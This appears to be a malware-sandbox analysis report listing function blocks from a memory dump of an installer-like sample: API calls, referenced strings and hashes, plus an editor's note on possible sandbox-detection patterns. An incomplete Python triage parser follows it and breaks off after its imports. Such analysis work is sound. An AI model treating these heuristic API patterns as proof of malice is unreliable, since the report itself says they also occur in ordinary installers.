• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Path$Find$CloseFullName_wcsrchr$ErrorFileFirstLast
• String ID: *.*$\\?\$\\?\UNC\
• API String ID: 1241272779-1700010636
• Opcode ID: 8c93d3ffb126bffe134411186b134cafb9611119a3d59e34e735d07eaf6de90c
• Instruction ID: 35e4e4e502113f91b97d0f6f0bf117b6fb492c992b95e627c0b427433749d721
• Opcode Fuzzy Hash: 8c93d3ffb126bffe134411186b134cafb9611119a3d59e34e735d07eaf6de90c
• Instruction Fuzzy Hash: 5632F170600602AFDB14DF6CC889BAAF7F5FF50314F148AAAE415DB391EB729944CB90
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00BC5A10: EnterCriticalSection.KERNEL32(00E9E7BC,1FC3D414,00000000,?,?,?,?,?,?,00BC523E,00DAB23D,000000FF), ref: 00BC5A4D
  • Part of subcall function 00BC5A10: LoadCursorW.USER32(00000000,00007F00), ref: 00BC5AC8
  • Part of subcall function 00BC5A10: LoadCursorW.USER32(00000000,00007F00), ref: 00BC5B6E
• SysFreeString.OLEAUT32(00000000), ref: 00BC5623
• SysAllocString.OLEAUT32(00000000), ref: 00BC5654
• GetWindowLongW.USER32(?,000000EC), ref: 00BC572B
• GetWindowLongW.USER32(?,000000EC), ref: 00BC573B
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BC5746
• NtdllDefWindowProc_W.NTDLL(?,?,00000001,?), ref: 00BC5754
• GetWindowLongW.USER32(?,000000EB), ref: 00BC5762
• SetWindowTextW.USER32(?,00E1329C), ref: 00BC5801
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00BC5836
• GlobalLock.KERNEL32 ref: 00BC5844
• GlobalUnlock.KERNEL32(?), ref: 00BC5898
• SetWindowLongW.USER32(?,000000EB,00000000), ref: 00BC5923
• SysFreeString.OLEAUT32(00000000), ref: 00BC593C
• NtdllDefWindowProc_W.NTDLL(?,?,?,00000000), ref: 00BC5983
• SysFreeString.OLEAUT32(00000000), ref: 00BC59A2
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Window$Long$String$FreeGlobal$AllocCursorLoadNtdllProc_$CriticalEnterLockSectionTextUnlock
• String ID:
• API String ID: 4180125975-0
• Opcode ID: 9f33d05fa7356c0341f0dc2e2032be8f0e638c01df550e1a83d61bc2f38b5a8d
• Instruction ID: f7dcbaffbe55a96756e2834e65eb3437d15bf7db2a04b4532e105af8912f47da
• Opcode Fuzzy Hash: 9f33d05fa7356c0341f0dc2e2032be8f0e638c01df550e1a83d61bc2f38b5a8d
• Instruction Fuzzy Hash: 7ED1D071900609EFDB20DFA5CC48FAEBBF8EF45320F1441ADE811A7291DB75A944CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00BCF4D3
• ShowWindow.USER32(00000000,?), ref: 00BCF4F2
• SetWindowLongW.USER32(?,000000EB,00000000), ref: 00BCF500
• GetWindowRect.USER32(00000000,?), ref: 00BCF517
• ShowWindow.USER32(00000000,?), ref: 00BCF538
• SetWindowLongW.USER32(?,000000EB,?), ref: 00BCF54F
  • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
• ShowWindow.USER32(?,?), ref: 00BCF68D
• GetWindowLongW.USER32(?,000000EB), ref: 00BCF6BC
• ShowWindow.USER32(?,?), ref: 00BCF6D9
• GetWindowRect.USER32(?,?), ref: 00BCF6FE
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Window$LongShow$Rect$AllocHeap
• String ID:
• API String ID: 3066103627-0
• Opcode ID: 37b463daddcfe9efd171ef29f7ad0515d17845667b60c4f5efe4badf9ba4cd3a
• Instruction ID: f434a12fcd46439aa5e481d82b59539e00e5b607d9788441d3c9fc7220b6f27e
• Opcode Fuzzy Hash: 37b463daddcfe9efd171ef29f7ad0515d17845667b60c4f5efe4badf9ba4cd3a
• Instruction Fuzzy Hash: 0C422971A042099FCB14CFA9D884BAEBBF6FF48304F1485AEE499A7261D730A945CF51
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
• FindFirstFileW.KERNEL32(?,?,?,00000001), ref: 00CDAEE2
• FindClose.KERNEL32(00000000), ref: 00CDAF10
• FindClose.KERNEL32(00000000), ref: 00CDAF99
Strings
• Not selected for install., xrefs: 00CDB4B3
• No acceptable version found. Operating System not supported., xrefs: 00CDB49E
• No acceptable version found. It must be downloaded manually from a site., xrefs: 00CDB497
• An acceptable version was found., xrefs: 00CDB482
• No acceptable version found. It is already downloaded and it will be installed., xrefs: 00CDB4A5
• No acceptable version found., xrefs: 00CDB4AC
• No acceptable version found. It must be downloaded., xrefs: 00CDB490
• No acceptable version found. It must be installed from package., xrefs: 00CDB489
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$CloseInit_thread_footer$FileFirstHeapProcess
                                                                                                                                                                        • String ID: An acceptable version was found.$No acceptable version found.$No acceptable version found. It is already downloaded and it will be installed.$No acceptable version found. It must be downloaded manually from a site.$No acceptable version found. It must be downloaded.$No acceptable version found. It must be installed from package.$No acceptable version found. Operating System not supported.$Not selected for install.
                                                                                                                                                                        • API String ID: 544434140-749633484
                                                                                                                                                                        • Opcode ID: c9a1ab769af9a96bb7e0d566c6fe2c5c9b4ea465ffbea32b2ed8bff3318d0c96
                                                                                                                                                                        • Instruction ID: ee77274e0a8aca03dee74b0d558431d4aaab8db52763682324aab7393801a04a
                                                                                                                                                                        • Opcode Fuzzy Hash: c9a1ab769af9a96bb7e0d566c6fe2c5c9b4ea465ffbea32b2ed8bff3318d0c96
                                                                                                                                                                        • Instruction Fuzzy Hash: C2F18E70900609CFDB50DF68C9887AEFBF1EF85310F148299D5699B392DB349E45CB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
  • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
  • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
• CopyFileW.KERNEL32(?,?,00000000,00000000,00000000), ref: 00CDF078
• CopyFileW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?), ref: 00CDF579
  • Part of subcall function 00CB6270: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,00000000,?,00000000,00DB225D,000000FF,?,80004005,?,?), ref: 00CB6288
  • Part of subcall function 00CB6270: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,80004005,?,?,?,00000000,00DE48ED,000000FF,?,00CB4B55), ref: 00CB62BA
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ByteCharCopyFileHeapInit_thread_footerMultiWide$AllocFindProcessResource
• String ID: AI_PRODUCTNAME_ARP$InstanceId$ProductCode$ProductName$\\?\$instname-custom.mst$instname-target.msi${%0.8X-%0.4X-%0.4X-%0.2X%0.2X-%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X}
• API String ID: 1546577494-2893908338
• Opcode ID: c4455b7aeb7dd2d6346b954dc62c9ae7e316bdb012c423e66230a666c2feb65a
• Instruction ID: f3d37b00e93971f1b72e77a8b719c458eb05aa63a591f4b772c120d195e1d969
• Opcode Fuzzy Hash: c4455b7aeb7dd2d6346b954dc62c9ae7e316bdb012c423e66230a666c2feb65a
• Instruction Fuzzy Hash: 0ED2C0709006499FDB00DFA8C844BAEBBF4FF45314F1481AEE515AB392DB749E05CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00BDE311
  • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
  • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
• __Init_thread_footer.LIBCMT ref: 00BDE2CE
  • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
  • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
  • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
• SendMessageW.USER32(?,0000104D,00000000,?), ref: 00BDE832
• SendMessageW.USER32(?,0000102B,?,0000000F), ref: 00BDE8E0
• SendMessageW.USER32(?,00001003,00000001,?), ref: 00BDE981
  • Part of subcall function 00CC2170: __cftof.LIBCMT ref: 00CC21C0
• SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 00BDEB09
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: MessageSend$CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake__cftof
• String ID: AiFeatIco$Icon$d$d
• API String ID: 2303580663-2874926508
• Opcode ID: cfd4313082bbefcb4420050da2a86bfdc54e6dfc1fb50453e3a2be1ef12d0e38
• Instruction ID: 987599ba5a4227c3b942bc641e6023f204426da7dce3afaafbcc0dcae33587e0
• Opcode Fuzzy Hash: cfd4313082bbefcb4420050da2a86bfdc54e6dfc1fb50453e3a2be1ef12d0e38
• Instruction Fuzzy Hash: D6525771900658DFDB24DB68CC88BEDBBF5AB49304F1441DAE459AB391EB70AE84CF50
Uniqueness

Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 00CD2B4D
• __Init_thread_footer.LIBCMT ref: 00CD2CEC
  • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
  • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
• GetStdHandle.KERNEL32(000000F5,?,1FC3D414,?,?), ref: 00CD2D74
• GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 00CD2D7B
• GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 00CD2D8F
• SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00CD2D96
• GetStdHandle.KERNEL32(000000F5,000000FF,?,00000000,?,00000000,00E15F2C,00000002,?,?), ref: 00CD2E25
• SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00CD2E2C
• IsWindow.USER32(00000000), ref: 00CD30BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ConsoleHandle$AttributeCriticalInit_thread_footerSectionText$BufferEnterInfoLeaveScreenWindow
• String ID: Error
• API String ID: 2811146417-2619118453
• Opcode ID: bef0c7cedae2598316e9ffb1afa09bbc626b68ca409ed7d3bac7d7858b85a47c
• Instruction ID: 3186c542de3fef0e51cf88b704a285faf20f2a2f8579999cba2d225ab7c2ff83
• Opcode Fuzzy Hash: bef0c7cedae2598316e9ffb1afa09bbc626b68ca409ed7d3bac7d7858b85a47c
• Instruction Fuzzy Hash: 26428D71D00259CFDB20DFA8CC45BADBBB0BF55314F24829AE119B7291DB746A89CF60
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?), ref: 00D6686D
                                                                                                                                                                        • GetProcessAffinityMask.KERNEL32 ref: 00D66874
                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 00D668F5
                                                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 00D66944
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00D6694B
                                                                                                                                                                        • GlobalMemoryStatus.KERNEL32 ref: 00D6699B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$AddressAffinityCurrentGlobalHandleInfoMaskMemoryModuleProcStatusSystem
                                                                                                                                                                        • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                                        • API String ID: 3120231856-802862622
                                                                                                                                                                        • Opcode ID: d3cd6be8cf990d470feda16804432e8afdc5173eaf2a789fc1a1d16ed4db917c
                                                                                                                                                                        • Instruction ID: 924047e6357560c97e10432d3cf7cba62e32a770d0778544e945bdca40f6403e
                                                                                                                                                                        • Opcode Fuzzy Hash: d3cd6be8cf990d470feda16804432e8afdc5173eaf2a789fc1a1d16ed4db917c
                                                                                                                                                                        • Instruction Fuzzy Hash: CC718CB2A083118FD708CF69D89475BBBE5BBC8314F09892DE899C7351D7B4D908CB96
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $AI_DynInstances$AI_GenNewCompGuids$AI_MajorUpgrades$InstanceId$Manufacturer$OldProductCode$ProductCode$ProductVersion$UpgradeCode$Xd$Xd$Xd
                                                                                                                                                                        • API String ID: 0-1684879038
                                                                                                                                                                        • Opcode ID: 0a41049ecfa1ab99c84cc92774afb373f1b89145f080cd52a94b0c87d9e41929
                                                                                                                                                                        • Instruction ID: 1dd5e81e184bd4bbfa09ecfa1439c4387d5708b246ce1a62f9d8b657da2abd81
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a41049ecfa1ab99c84cc92774afb373f1b89145f080cd52a94b0c87d9e41929
                                                                                                                                                                        • Instruction Fuzzy Hash: 0162B031D00258DBDB14CB68CC54BEEBBB5EF55304F2482DAE406B7391EB746A85CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00BC508B
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00BC509B
                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 00BC50A6
                                                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(00000000,00000000,00000001,?), ref: 00BC50B4
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EB), ref: 00BC50C2
                                                                                                                                                                        • SetWindowTextW.USER32(00000000,00E1329C), ref: 00BC5161
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00BC5196
                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00BC51A4
                                                                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00BC51F8
                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BC525D
                                                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(00000000,00000000,1FC3D414,00000000), ref: 00BC52AF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Long$Global$NtdllProc_$AllocLockTextUnlock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3555041256-0
                                                                                                                                                                        • Opcode ID: 5c3f8e204cc326aa710b15330969429212a1f401a9b437fb3f9a2b2027b9ea8f
                                                                                                                                                                        • Instruction ID: 4ab746c58e65b6cf539ed1569bc71c14f6a847af3f231c9ebe61abd937014250
                                                                                                                                                                        • Opcode Fuzzy Hash: 5c3f8e204cc326aa710b15330969429212a1f401a9b437fb3f9a2b2027b9ea8f
                                                                                                                                                                        • Instruction Fuzzy Hash: 12E1C071A00605AFDB20DF68CC48FAFBBE8EF45310F1441ADE915EB291DB74A944CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BE84FC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID: ' AND `Control_`='$AiTabPage$ControlEvent$Dialog$Lt$SpawnDialog$Title$`Dialog_`='
                                                                                                                                                                        • API String ID: 3850602802-3052257113
                                                                                                                                                                        • Opcode ID: 15c7851d77c9bdef7b7ee46fdf623d53093da4d658ece1637ef27d94c4e43dd5
                                                                                                                                                                        • Instruction ID: b7fc15ab2674e32eb2d04478c25b2fbd5404958f9c08c2aa9c120c4db844ee76
                                                                                                                                                                        • Opcode Fuzzy Hash: 15c7851d77c9bdef7b7ee46fdf623d53093da4d658ece1637ef27d94c4e43dd5
                                                                                                                                                                        • Instruction Fuzzy Hash: 4972A071D00658DFDB14DFA8C885BEDB7F1FF58304F248299E409A7291DB74AA85CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 00D67B4B
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D67B5A
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?), ref: 00D67B64
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00D67B95
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle$CreateErrorFileLast
                                                                                                                                                                        • String ID: NUMBER_OF_PROCESSORS$TQ
                                                                                                                                                                        • API String ID: 3884794734-3181195941
                                                                                                                                                                        • Opcode ID: 9eafe67c11d4fc3c1f4aa5626214fc8a18702d698a34a26a5ccdd019bf7dc7bc
                                                                                                                                                                        • Instruction ID: cf0a6c686532196cd9123248d18ff6ecbee03d6e708a34575210f71e679ceaaf
                                                                                                                                                                        • Opcode Fuzzy Hash: 9eafe67c11d4fc3c1f4aa5626214fc8a18702d698a34a26a5ccdd019bf7dc7bc
                                                                                                                                                                        • Instruction Fuzzy Hash: AE126E70904249DFDB10CFA8C884BDEBBF1FF08318F1481A9E459AB291D7759A49CF60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%
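Two of the function blocks above are the ones an analyst usually stops at when skimming this part of a report: the block at 00D668F5 combines GetSystemInfo, GetModuleHandleA, GetProcAddress and GlobalMemoryStatus with the strings "GlobalMemoryStatusEx" and "kernel32.dll", which is consistent with resolving GlobalMemoryStatusEx at run time and falling back to GlobalMemoryStatus; the block at 00D67B4B pairs CreateFileW/CloseHandle/GetLastError with the string "NUMBER_OF_PROCESSORS". Both patterns occur in ordinary installer code as well as in sandbox-detection routines, so they are triage hints, not verdicts. The following Python is an added example (editor's code, not part of Joe Sandbox or of this report) that parses the listing format shown on this page, the "APIs", "String ID" and "Instruction Fuzzy Hash" lines separated by "Uniqueness Score" lines, into structured blocks and tags the two patterns. The sample input is an excerpt of the two blocks above; the FINGERPRINT_APIS list and the flag names are the editor's own assumptions.

```python
"""Parse Joe Sandbox function-block listings and tag blocks whose API/string
combination suggests host fingerprinting or dynamic API resolution.
Heuristic triage aid only; the flags are not a verdict on the sample."""
import re
from dataclasses import dataclass, field

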